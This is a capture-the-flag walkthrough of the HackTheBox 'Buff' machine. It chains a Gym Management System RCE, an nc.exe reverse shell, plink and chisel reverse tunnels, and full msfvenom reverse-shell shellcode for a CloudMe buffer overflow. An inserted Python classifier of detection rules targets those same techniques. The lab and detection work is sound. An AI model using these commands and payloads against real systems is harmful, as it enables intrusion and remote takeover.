
HackTheBox: Buff



Started by enumerating ports:

root@osboxes:~# scan
[*] OS based on TTL
[*] TCP Scan
Open ports: 7680,8080
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
[*] Execution time:
	 TTL: 0
	 Furious: 132
	 Nmap: 71
	 Total: 203


Manually enumerated the web application until I found that it is running Gym Management System 1.0:

Found an exploit for that particular CMS:

root@osboxes:~/Downloads# searchsploit gym
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                      |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution                                                                                   | php/webapps/
WordPress Plugin WPGYM - SQL Injection                                                                                                              | php/webapps/42801.txt
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
root@osboxes:~/Downloads# searchsploit -m 48506
  Exploit: Gym Management System 1.0 - Unauthenticated Remote Code Execution
     Path: /usr/share/exploitdb/exploits/php/webapps/
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /root/Downloads/

Then used the exploit to get a webshell and from it a reverse shell:

root@osboxes:~/Documents/Buff# python
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> nc.exe -e cmd.exe 443

To download the needed files onto the box, use PowerShell: Invoke-WebRequest "http://<YOUR-IP>:8000/FILE" -OutFile "C:\OUT_DIR\FILENAME"


After some enumeration I found a weird file:

 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun\Downloads

30/07/2020  00:29    <DIR>          .
30/07/2020  00:29    <DIR>          ..
16/06/2020  16:26        17,830,824 CloudMe_1112.exe
               1 File(s)     17,830,824 bytes
               2 Dir(s)   6,235,152,384 bytes free

Did some research and found a BOF exploit for it.

As the victim doesn't have Python, let's redirect the port that CloudMe listens on to our host:

C:\xampp\htdocs\gym\upload>plink.exe -l root -pw root  -R 4444:
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's ssh-ed25519 key fingerprint is:
ssh-ed25519 255 b1:bd:fd:b1:60:8a:6f:8a:02:11:f0:79:f5:3a:a2:af
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
Store key in cache? (y/n) y
Using username "root".
Linux osboxes 5.7.0-kali1-amd64 #1 SMP Debian 5.7.6-1kali2 (2020-07-01) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jul 29 21:23:02 2020 from

Alternatively, you could use chisel:

chisel server -p 3232 -reverse -v
SharpChisel.exe client R:
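A detection-side counterpart to the tradecraft shown above (the nc.exe reverse shell launched from the webshell, the Invoke-WebRequest download to disk, and the plink / chisel reverse tunnels), as an added example that is not part of the original writeup: a small Python classifier run over constructed process-creation events. The event shape (parent image, image, command line), the rule names, and the IPs, ports and paths in the sample events are assumptions for illustration, not values captured from the box.

```python
"""Flag process-creation events matching the tradecraft seen in this writeup.

Added example, not from the original post.  The events below are constructed
(Windows 4688 / Sysmon-style parent, image, command line), not box captures.
"""
import re
from dataclasses import dataclass

# Each rule is a compiled regex matched against the full command line.
# Rule names are assumptions chosen for this example.
RULES = {
    # nc.exe -e cmd.exe <ip> <port>
    "netcat_reverse_shell": re.compile(
        r"\bnc(?:at)?(?:\.exe)?\b.*\s-e\s+cmd(?:\.exe)?", re.I),
    # plink.exe ... -R <remote-port>:<host>:<port> <ssh-server>
    "plink_remote_forward": re.compile(
        r"\bplink(?:\.exe)?\b.*\s-R\s+\d+:", re.I),
    # chisel / SharpChisel client <server> R:<remote>:<local>
    "chisel_reverse_tunnel": re.compile(
        r"chisel(?:\.exe)?\b.*\bclient\b.*\bR:", re.I),
    # PowerShell download written straight to disk
    "powershell_download_to_disk": re.compile(
        r"Invoke-WebRequest\b.*-OutFile\b", re.I),
}

WEBSERVER_PARENT = re.compile(r"(?:httpd|php(?:-cgi)?)\.exe$", re.I)
SHELL_IMAGE = re.compile(r"(?:cmd|powershell|nc|ncat|plink)\.exe$", re.I)


@dataclass(frozen=True)
class ProcEvent:
    parent: str    # parent process image path
    image: str     # new process image path
    cmdline: str   # full command line


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event trips (empty list if clean)."""
    hits = [name for name, rx in RULES.items() if rx.search(ev.cmdline)]
    # An Apache/PHP worker (XAMPP here) has no business spawning a shell,
    # netcat or an SSH client; that lineage alone is a strong webshell signal.
    if WEBSERVER_PARENT.search(ev.parent) and SHELL_IMAGE.search(ev.image):
        hits.append("webserver_spawned_shell")
    return hits


# Constructed sample events; 10.10.14.5 stands in for the attacker host.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\xampp\apache\bin\httpd.exe",
              r"C:\xampp\htdocs\gym\upload\nc.exe",
              r"nc.exe -e cmd.exe 10.10.14.5 443"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell Invoke-WebRequest "http://10.10.14.5:8000/plink.exe" '
              r'-OutFile "C:\xampp\htdocs\gym\upload\plink.exe"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\xampp\htdocs\gym\upload\plink.exe",
              r"plink.exe -l root -pw root -R 4444:127.0.0.1:4444 10.10.14.5"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Users\shaun\Downloads\SharpChisel.exe",
              r"SharpChisel.exe client 10.10.14.5:3232 R:4444:127.0.0.1:4444"),
    # Benign control event
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\notepad.exe",
              r"notepad.exe notes.txt"),
]


def report(events: list[ProcEvent]) -> dict[str, list[str]]:
    """Map each flagged command line to the rules it tripped."""
    return {ev.cmdline: hits for ev in events if (hits := classify(ev))}


if __name__ == "__main__":
    for cmdline, hits in report(SAMPLE_EVENTS).items():
        print(f"{', '.join(hits):45s} <- {cmdline}")
```

The command-line rules are deliberately loose (they key on the option shapes, not on the exact binary name) because the binaries are trivially renamed; the parent/child lineage rule needs no such guess, which is why it fires on the first sample event independently of the netcat rule.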

Then created our own shellcode payload with msfvenom, avoiding the bad characters \x00, \x0a and \x0d:

root@osboxes:~/Downloads# msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=5555 -a x86 -b '\x00\x0a\x0d' -e x86/shikata_ga_nai -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1712 bytes
buf =  b""
buf += b"\xdb\xcc\xd9\x74\x24\xf4\xba\x46\xc9\x1f\xe1\x5b\x29"
buf += b"\xc9\xb1\x52\x31\x53\x17\x03\x53\x17\x83\xad\x35\xfd"
buf += b"\x14\xcd\x2e\x80\xd7\x2d\xaf\xe5\x5e\xc8\x9e\x25\x04"
buf += b"\x99\xb1\x95\x4e\xcf\x3d\x5d\x02\xfb\xb6\x13\x8b\x0c"
buf += b"\x7e\x99\xed\x23\x7f\xb2\xce\x22\x03\xc9\x02\x84\x3a"
buf += b"\x02\x57\xc5\x7b\x7f\x9a\x97\xd4\x0b\x09\x07\x50\x41"
buf += b"\x92\xac\x2a\x47\x92\x51\xfa\x66\xb3\xc4\x70\x31\x13"
buf += b"\xe7\x55\x49\x1a\xff\xba\x74\xd4\x74\x08\x02\xe7\x5c"
buf += b"\x40\xeb\x44\xa1\x6c\x1e\x94\xe6\x4b\xc1\xe3\x1e\xa8"
buf += b"\x7c\xf4\xe5\xd2\x5a\x71\xfd\x75\x28\x21\xd9\x84\xfd"
buf += b"\xb4\xaa\x8b\x4a\xb2\xf4\x8f\x4d\x17\x8f\xb4\xc6\x96"
buf += b"\x5f\x3d\x9c\xbc\x7b\x65\x46\xdc\xda\xc3\x29\xe1\x3c"
buf += b"\xac\x96\x47\x37\x41\xc2\xf5\x1a\x0e\x27\x34\xa4\xce"
buf += b"\x2f\x4f\xd7\xfc\xf0\xfb\x7f\x4d\x78\x22\x78\xb2\x53"
buf += b"\x92\x16\x4d\x5c\xe3\x3f\x8a\x08\xb3\x57\x3b\x31\x58"
buf += b"\xa7\xc4\xe4\xcf\xf7\x6a\x57\xb0\xa7\xca\x07\x58\xad"
buf += b"\xc4\x78\x78\xce\x0e\x11\x13\x35\xd9\x14\xee\x3a\xd8"
buf += b"\x41\xec\x44\xcf\x22\x79\xa2\x85\x54\x2c\x7d\x32\xcc"
buf += b"\x75\xf5\xa3\x11\xa0\x70\xe3\x9a\x47\x85\xaa\x6a\x2d"
buf += b"\x95\x5b\x9b\x78\xc7\xca\xa4\x56\x6f\x90\x37\x3d\x6f"
buf += b"\xdf\x2b\xea\x38\x88\x9a\xe3\xac\x24\x84\x5d\xd2\xb4"
buf += b"\x50\xa5\x56\x63\xa1\x28\x57\xe6\x9d\x0e\x47\x3e\x1d"
buf += b"\x0b\x33\xee\x48\xc5\xed\x48\x23\xa7\x47\x03\x98\x61"
buf += b"\x0f\xd2\xd2\xb1\x49\xdb\x3e\x44\xb5\x6a\x97\x11\xca"
buf += b"\x43\x7f\x96\xb3\xb9\x1f\x59\x6e\x7a\x2f\x10\x32\x2b"
buf += b"\xb8\xfd\xa7\x69\xa5\xfd\x12\xad\xd0\x7d\x96\x4e\x27"
buf += b"\x9d\xd3\x4b\x63\x19\x08\x26\xfc\xcc\x2e\x95\xfd\xc4"

Finally, updated the exploit with the new shellcode and started a netcat listener to catch the connection:

root@osboxes:~# rlwrap nc -lvnp 5555
listening on [any] 5555 ...
connect to [] from (UNKNOWN) [] 49842
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.


InTernet lover